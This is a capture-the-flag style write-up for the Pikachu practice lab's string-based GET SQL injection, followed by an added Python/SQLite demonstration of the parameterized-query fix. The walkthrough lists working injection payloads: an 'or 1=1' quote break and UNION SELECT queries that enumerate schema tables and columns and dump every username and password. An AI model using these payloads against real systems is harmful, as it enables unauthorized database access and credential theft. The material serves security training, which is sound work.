Pikachu lab - Sql Inject (SQL injection) - String-based injection (GET) – Author: 知非知非知非

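From the output shown above, the back-end query logic is presumably:

select uid,email from <table> where username = 'kobe';

or

select uid,email from <table> where username = "kobe";

Now we construct the input!!!!

kobe' or 1=1#   // note: there is a space after the #; this one succeeded

or

kobe" or 1=1#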

The remaining steps are the same as usual, so I'll just post screenshots!!!!

Two columns:

-1' union select 1,2#'

-1' union select database(),version()#'

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu'#'

-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='member'#'

-1' union select username,pw from member#'

All username and password pairs have been obtained. Done!!!
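
Why the inferred query behaves this way, and what the fix looks like, as an added example (not code from the original post or from the pikachu project): the same lookup built by string concatenation and with a bound parameter. It assumes an in-memory SQLite database standing in for the lab's MySQL, constructed sample rows, and SQLite's "--" comment in place of the page's "#".

```python
import sqlite3

# Constructed sample rows; uid/email/username/pw are the column names the page shows.
ROWS = [
    (1, "vince", "vince@example.test", "hash-1"),
    (2, "kobe", "kobe@example.test", "hash-2"),
    (3, "lucy", "lucy@example.test", "hash-3"),
]

def make_db():
    """In-memory SQLite database standing in for the lab's MySQL `member` table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE member (uid INTEGER, username TEXT, email TEXT, pw TEXT)")
    db.executemany("INSERT INTO member VALUES (?, ?, ?, ?)", ROWS)
    return db

def lookup_concat(db, name):
    """Vulnerable form: the input is spliced between the quotes of the statement."""
    sql = "SELECT uid, email FROM member WHERE username = '" + name + "'"
    return db.execute(sql).fetchall()

def lookup_param(db, name):
    """Hardened form: the driver binds the input as one string value."""
    sql = "SELECT uid, email FROM member WHERE username = ?"
    return db.execute(sql, (name,)).fetchall()

def compare(name):
    """Return (rows from concatenated query, rows from parameterized query)."""
    db = make_db()
    try:
        return lookup_concat(db, name), lookup_param(db, name)
    finally:
        db.close()

if __name__ == "__main__":
    # SQLite comments start with "--" where the page's MySQL input uses "#".
    for value in ("kobe", "kobe' or 1=1-- "):
        concat_rows, param_rows = compare(value)
        print(f"{value!r}: concatenated={len(concat_rows)} rows, "
              f"parameterized={len(param_rows)} rows")
```

With the bound parameter the quote character stays inside the value, so the second input matches no username and returns nothing.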

Source: freebuf.com 2021-07-20 08:25:25 by: 知非知非知非
